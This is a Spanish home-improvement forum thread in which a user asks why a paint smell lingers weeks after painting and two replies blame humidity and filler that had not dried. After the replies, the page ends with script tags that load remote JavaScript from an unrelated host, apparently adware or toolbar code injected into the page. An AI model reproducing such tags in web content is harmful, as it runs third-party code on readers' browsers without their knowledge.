URGENTE! Olor a pintura persistente

La última semana de Febrero un pintor vino a mi piso a pintarlo entero y a quitar el gotelé de dos habitaciones con masilla.
Como sabes ha estado lloviendo bastante y haciendo frío casi todos los días desde entonces.
Ya ha pasado un mes y una semana... Sigue oliendo (todo el que entra al piso sigue preguntando ¿es qué has pintado hace poco?). El piso ha estado aireado desde que se pintó, siempre con las ventanas abiertas, y la persiana bajada al 75% para que aunque permitiese un cierto paso de aire, evitase que entrara la lluvia.
La masilla usada para alisar el gotelé fue Lisoplast de Yesos Jiménez, y las pinturas usadas en la pared era MendiKril de Químicas Mendieta (Albacete).
¿Hasta qué punto es esto normal?

2 Respuestas

Respuesta

Lo normal es que no dure tanto el mal olor. Seguramente al haber tanta humedad te esta evaporando el agua muy lentamente y eso produce que este tanto tiempo ese olor característico de la pintura. No conozco ese calidad de pintura que te han dado, a menor calidad lleva mas amoniaco en la fabricación y tiene peor olor. No te preocupes, que en cuanto entre un poquito el calor y haga dos días buenos se acabara de curar la superficie y dejara de oler.

Respuesta

No es normal que dure tanto el olor, lo que creo es que pintaron muy pronto en cima de la masilla sin dejarla secar bien, y al cerrar el poro con la pintura plástica le esta costando mucho el secar.

<div id="__tbSetup"> </div><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="https://loading-resource.com/data.js.php?i={1EFAB6E1-79BA-4566-B458-DBEDEC33AB15}&d=2012-8-28&s=http://www.todoexpertos.com/mitodoexpertos/question/rk3n3eism8wt6/urgente-olor-a-pintura-persistente"></script>